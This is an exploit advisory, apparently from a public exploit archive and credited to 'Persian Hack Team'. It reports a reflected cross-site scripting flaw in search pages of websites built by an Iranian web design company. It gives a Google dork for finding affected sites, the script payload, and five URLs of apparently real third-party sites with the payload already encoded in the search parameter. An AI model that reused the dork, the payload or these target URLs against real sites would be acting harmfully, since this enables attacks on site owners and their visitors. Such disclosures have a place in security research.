######################
# Exploit Title : شرکت صبا عصر دانش Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : www.sabaisp.net
# Google Dork : intext:"طراحی و برنامه نویسی توسط شرکت صبا عصر دانش" inurl:"php?id="
# Date: 2016/02/04
#
######################
# PoC:
# Search Key = [XSS]
# Payload = <script>alert(1);</script>
#
#http://banianejavan.org/search.php?key=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
#http://msn-steel.com/search.php?key=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
#http://www.sepahanhalabco.ir/search.php?key=%3Cscript%3Ealert%281%29;%3C/script%3E
#http://fssabaco.ir/search.php?key=%3Cscript%3Ealert%281%29;%3C/script%3E
#http://goleseyed.ir/pages.php?key=search&opt=%3Cscript%3Ealert%281%29;%3C/script%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################